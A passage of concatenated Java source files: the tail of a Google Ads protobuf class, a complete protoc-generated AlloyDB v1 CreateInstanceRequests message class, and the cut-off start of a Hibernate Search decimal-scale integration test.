builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CustomerConversionGoalOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CustomerConversionGoalOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v21.services.CustomerConversionGoalOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,879
java-alloydb/proto-google-cloud-alloydb-v1/src/main/java/com/google/cloud/alloydb/v1/CreateInstanceRequests.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/alloydb/v1/service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.alloydb.v1; /** * * * <pre> * See usage below for notes. * </pre> * * Protobuf type {@code google.cloud.alloydb.v1.CreateInstanceRequests} */ public final class CreateInstanceRequests extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.alloydb.v1.CreateInstanceRequests) CreateInstanceRequestsOrBuilder { private static final long serialVersionUID = 0L; // Use CreateInstanceRequests.newBuilder() to construct. private CreateInstanceRequests(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CreateInstanceRequests() { createInstanceRequests_ = java.util.Collections.emptyList(); } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new CreateInstanceRequests(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.alloydb.v1.ServiceProto .internal_static_google_cloud_alloydb_v1_CreateInstanceRequests_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.alloydb.v1.ServiceProto .internal_static_google_cloud_alloydb_v1_CreateInstanceRequests_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.alloydb.v1.CreateInstanceRequests.class, com.google.cloud.alloydb.v1.CreateInstanceRequests.Builder.class); } public static final int CREATE_INSTANCE_REQUESTS_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.cloud.alloydb.v1.CreateInstanceRequest> createInstanceRequests_; /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public java.util.List<com.google.cloud.alloydb.v1.CreateInstanceRequest> getCreateInstanceRequestsList() { return createInstanceRequests_; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public java.util.List<? extends com.google.cloud.alloydb.v1.CreateInstanceRequestOrBuilder> getCreateInstanceRequestsOrBuilderList() { return createInstanceRequests_; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public int getCreateInstanceRequestsCount() { return createInstanceRequests_.size(); } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.cloud.alloydb.v1.CreateInstanceRequest getCreateInstanceRequests(int index) { return createInstanceRequests_.get(index); } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.cloud.alloydb.v1.CreateInstanceRequestOrBuilder getCreateInstanceRequestsOrBuilder(int index) { return createInstanceRequests_.get(index); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < createInstanceRequests_.size(); i++) { output.writeMessage(1, createInstanceRequests_.get(i)); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < createInstanceRequests_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize( 1, createInstanceRequests_.get(i)); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.alloydb.v1.CreateInstanceRequests)) { return super.equals(obj); } com.google.cloud.alloydb.v1.CreateInstanceRequests other = (com.google.cloud.alloydb.v1.CreateInstanceRequests) obj; if (!getCreateInstanceRequestsList().equals(other.getCreateInstanceRequestsList())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getCreateInstanceRequestsCount() > 0) { hash = (37 * hash) + CREATE_INSTANCE_REQUESTS_FIELD_NUMBER; hash = (53 * hash) + getCreateInstanceRequestsList().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloud.alloydb.v1.CreateInstanceRequests prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * See usage below for notes. * </pre> * * Protobuf type {@code google.cloud.alloydb.v1.CreateInstanceRequests} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.alloydb.v1.CreateInstanceRequests) com.google.cloud.alloydb.v1.CreateInstanceRequestsOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.alloydb.v1.ServiceProto .internal_static_google_cloud_alloydb_v1_CreateInstanceRequests_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.alloydb.v1.ServiceProto .internal_static_google_cloud_alloydb_v1_CreateInstanceRequests_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.alloydb.v1.CreateInstanceRequests.class, com.google.cloud.alloydb.v1.CreateInstanceRequests.Builder.class); } // Construct using com.google.cloud.alloydb.v1.CreateInstanceRequests.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (createInstanceRequestsBuilder_ == null) { createInstanceRequests_ = java.util.Collections.emptyList(); } else { createInstanceRequests_ = null; createInstanceRequestsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.alloydb.v1.ServiceProto .internal_static_google_cloud_alloydb_v1_CreateInstanceRequests_descriptor; } @java.lang.Override public com.google.cloud.alloydb.v1.CreateInstanceRequests getDefaultInstanceForType() { return com.google.cloud.alloydb.v1.CreateInstanceRequests.getDefaultInstance(); } @java.lang.Override public com.google.cloud.alloydb.v1.CreateInstanceRequests build() { com.google.cloud.alloydb.v1.CreateInstanceRequests result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.alloydb.v1.CreateInstanceRequests buildPartial() { com.google.cloud.alloydb.v1.CreateInstanceRequests result = new com.google.cloud.alloydb.v1.CreateInstanceRequests(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.alloydb.v1.CreateInstanceRequests result) { if (createInstanceRequestsBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { createInstanceRequests_ = java.util.Collections.unmodifiableList(createInstanceRequests_); bitField0_ = (bitField0_ & ~0x00000001); } result.createInstanceRequests_ = createInstanceRequests_; } else { result.createInstanceRequests_ = createInstanceRequestsBuilder_.build(); } } private void buildPartial0(com.google.cloud.alloydb.v1.CreateInstanceRequests result) { int from_bitField0_ = bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.alloydb.v1.CreateInstanceRequests) { return mergeFrom((com.google.cloud.alloydb.v1.CreateInstanceRequests) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.alloydb.v1.CreateInstanceRequests other) { if (other == com.google.cloud.alloydb.v1.CreateInstanceRequests.getDefaultInstance()) return this; if (createInstanceRequestsBuilder_ == null) { if (!other.createInstanceRequests_.isEmpty()) { if (createInstanceRequests_.isEmpty()) { createInstanceRequests_ = other.createInstanceRequests_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.addAll(other.createInstanceRequests_); } onChanged(); } } else { if (!other.createInstanceRequests_.isEmpty()) { if (createInstanceRequestsBuilder_.isEmpty()) { createInstanceRequestsBuilder_.dispose(); createInstanceRequestsBuilder_ = null; createInstanceRequests_ = other.createInstanceRequests_; bitField0_ = (bitField0_ & ~0x00000001); createInstanceRequestsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? getCreateInstanceRequestsFieldBuilder() : null; } else { createInstanceRequestsBuilder_.addAllMessages(other.createInstanceRequests_); } } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.cloud.alloydb.v1.CreateInstanceRequest m = input.readMessage( com.google.cloud.alloydb.v1.CreateInstanceRequest.parser(), extensionRegistry); if (createInstanceRequestsBuilder_ == null) { ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.add(m); } else { createInstanceRequestsBuilder_.addMessage(m); } break; } // case 10 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.alloydb.v1.CreateInstanceRequest> createInstanceRequests_ = java.util.Collections.emptyList(); private void ensureCreateInstanceRequestsIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { createInstanceRequests_ = new java.util.ArrayList<com.google.cloud.alloydb.v1.CreateInstanceRequest>( createInstanceRequests_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.alloydb.v1.CreateInstanceRequest, com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder, com.google.cloud.alloydb.v1.CreateInstanceRequestOrBuilder> createInstanceRequestsBuilder_; /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public java.util.List<com.google.cloud.alloydb.v1.CreateInstanceRequest> getCreateInstanceRequestsList() { if (createInstanceRequestsBuilder_ == null) { return java.util.Collections.unmodifiableList(createInstanceRequests_); } else { return createInstanceRequestsBuilder_.getMessageList(); } } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public int getCreateInstanceRequestsCount() { if (createInstanceRequestsBuilder_ == null) { return createInstanceRequests_.size(); } else { return createInstanceRequestsBuilder_.getCount(); } } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.alloydb.v1.CreateInstanceRequest getCreateInstanceRequests(int index) { if (createInstanceRequestsBuilder_ == null) { return createInstanceRequests_.get(index); } else { return createInstanceRequestsBuilder_.getMessage(index); } } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setCreateInstanceRequests( int index, com.google.cloud.alloydb.v1.CreateInstanceRequest value) { if (createInstanceRequestsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.set(index, value); onChanged(); } else { createInstanceRequestsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setCreateInstanceRequests( int index, com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder builderForValue) { if (createInstanceRequestsBuilder_ == null) { ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.set(index, builderForValue.build()); onChanged(); } else { createInstanceRequestsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder addCreateInstanceRequests( com.google.cloud.alloydb.v1.CreateInstanceRequest value) { if (createInstanceRequestsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.add(value); onChanged(); } else { createInstanceRequestsBuilder_.addMessage(value); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder addCreateInstanceRequests( int index, com.google.cloud.alloydb.v1.CreateInstanceRequest value) { if (createInstanceRequestsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.add(index, value); onChanged(); } else { createInstanceRequestsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder addCreateInstanceRequests( com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder builderForValue) { if (createInstanceRequestsBuilder_ == null) { ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.add(builderForValue.build()); onChanged(); } else { createInstanceRequestsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder addCreateInstanceRequests( int index, com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder builderForValue) { if (createInstanceRequestsBuilder_ == null) { ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.add(index, builderForValue.build()); onChanged(); } else { createInstanceRequestsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder addAllCreateInstanceRequests( java.lang.Iterable<? extends com.google.cloud.alloydb.v1.CreateInstanceRequest> values) { if (createInstanceRequestsBuilder_ == null) { ensureCreateInstanceRequestsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, createInstanceRequests_); onChanged(); } else { createInstanceRequestsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearCreateInstanceRequests() { if (createInstanceRequestsBuilder_ == null) { createInstanceRequests_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { createInstanceRequestsBuilder_.clear(); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder removeCreateInstanceRequests(int index) { if (createInstanceRequestsBuilder_ == null) { ensureCreateInstanceRequestsIsMutable(); createInstanceRequests_.remove(index); onChanged(); } else { createInstanceRequestsBuilder_.remove(index); } return this; } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder getCreateInstanceRequestsBuilder(int index) { return getCreateInstanceRequestsFieldBuilder().getBuilder(index); } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.alloydb.v1.CreateInstanceRequestOrBuilder getCreateInstanceRequestsOrBuilder(int index) { if (createInstanceRequestsBuilder_ == null) { return createInstanceRequests_.get(index); } else { return createInstanceRequestsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public java.util.List<? extends com.google.cloud.alloydb.v1.CreateInstanceRequestOrBuilder> getCreateInstanceRequestsOrBuilderList() { if (createInstanceRequestsBuilder_ != null) { return createInstanceRequestsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(createInstanceRequests_); } } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder addCreateInstanceRequestsBuilder() { return getCreateInstanceRequestsFieldBuilder() .addBuilder(com.google.cloud.alloydb.v1.CreateInstanceRequest.getDefaultInstance()); } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder addCreateInstanceRequestsBuilder(int index) { return getCreateInstanceRequestsFieldBuilder() .addBuilder( index, com.google.cloud.alloydb.v1.CreateInstanceRequest.getDefaultInstance()); } /** * * * <pre> * Required. Primary and read replica instances to be created. This list * should not be empty. * </pre> * * <code> * repeated .google.cloud.alloydb.v1.CreateInstanceRequest create_instance_requests = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public java.util.List<com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder> getCreateInstanceRequestsBuilderList() { return getCreateInstanceRequestsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.alloydb.v1.CreateInstanceRequest, com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder, com.google.cloud.alloydb.v1.CreateInstanceRequestOrBuilder> getCreateInstanceRequestsFieldBuilder() { if (createInstanceRequestsBuilder_ == null) { createInstanceRequestsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.alloydb.v1.CreateInstanceRequest, com.google.cloud.alloydb.v1.CreateInstanceRequest.Builder, com.google.cloud.alloydb.v1.CreateInstanceRequestOrBuilder>( createInstanceRequests_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); createInstanceRequests_ = null; } return createInstanceRequestsBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.alloydb.v1.CreateInstanceRequests) } // @@protoc_insertion_point(class_scope:google.cloud.alloydb.v1.CreateInstanceRequests) private static final com.google.cloud.alloydb.v1.CreateInstanceRequests DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.alloydb.v1.CreateInstanceRequests(); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CreateInstanceRequests> PARSER = new com.google.protobuf.AbstractParser<CreateInstanceRequests>() { @java.lang.Override public CreateInstanceRequests parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CreateInstanceRequests> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CreateInstanceRequests> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.alloydb.v1.CreateInstanceRequests getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
hibernate/hibernate-search
33,951
integrationtest/backend/tck/src/main/java/org/hibernate/search/integrationtest/backend/tck/decimalscale/DecimalScaleIT.java
/* * SPDX-License-Identifier: Apache-2.0 * Copyright Red Hat Inc. and Hibernate Authors */ package org.hibernate.search.integrationtest.backend.tck.decimalscale; import static org.assertj.core.api.Assertions.assertThat; import static org.assertj.core.api.Assertions.assertThatThrownBy; import static org.hibernate.search.util.impl.integrationtest.common.assertion.SearchResultAssert.assertThatQuery; import java.math.BigDecimal; import java.math.BigInteger; import org.hibernate.search.engine.backend.document.IndexFieldReference; import org.hibernate.search.engine.backend.document.model.dsl.IndexSchemaElement; import org.hibernate.search.engine.backend.types.Projectable; import org.hibernate.search.engine.mapper.mapping.building.spi.IndexFieldTypeDefaultsProvider; import org.hibernate.search.engine.mapper.mapping.building.spi.IndexedEntityBindingContext; import org.hibernate.search.engine.search.query.SearchQuery; import org.hibernate.search.integrationtest.backend.tck.testsupport.util.extension.SearchSetupHelper; import org.hibernate.search.util.common.SearchException; import org.hibernate.search.util.impl.integrationtest.mapper.stub.SimpleMappedIndex; import org.hibernate.search.util.impl.integrationtest.mapper.stub.StubMappedIndex; import org.junit.jupiter.api.Test; import org.junit.jupiter.api.extension.RegisterExtension; class DecimalScaleIT { /* * Longs only have 64 bits to represent the value, or approximately 18 decimal digits * (actually 19, but not all values with 19 digits can be represented). * We would expect the indexed value to be indexed with approximately that precision, * which is limited but still higher than the precision of doubles, * which have ~53 bits to represent the unscaled value, or approximately 16 decimal digits. * * TODO HSEARCH-3583 We do get this precision with the Lucene backend, * but unfortunately there's a bug in Elasticsearch that reduces precision * to that of a double. * We should fix that and raise this constant to 18. */ int INDEX_PRECISION = 16; @RegisterExtension public final SearchSetupHelper setupHelper = SearchSetupHelper.create(); @Test void noDecimalScale_bigDecimal() { assertThatThrownBy( () -> setupHelper.start() .withIndex( StubMappedIndex.ofNonRetrievable( root -> root.field( "noScaled", f -> f.asBigDecimal() ).toReference() ) ) .setup() ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Invalid index field type: missing decimal scale", "Define the decimal scale explicitly" ); } @Test void noDecimalScale_bigInteger() { assertThatThrownBy( () -> setupHelper.start() .withIndex( StubMappedIndex.ofNonRetrievable( root -> root.field( "noScaled", f -> f.asBigInteger() ).toReference() ) ) .setup() ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Invalid index field type: missing decimal scale", "Define the decimal scale explicitly" ); } @Test void positiveDecimalScale_bigInteger() { assertThatThrownBy( () -> setupHelper.start() .withIndex( StubMappedIndex.ofNonRetrievable( root -> root.field( "positiveScaled", f -> f.asBigInteger().decimalScale( 3 ) ).toReference() ) ) .setup() ) .isInstanceOf( SearchException.class ) 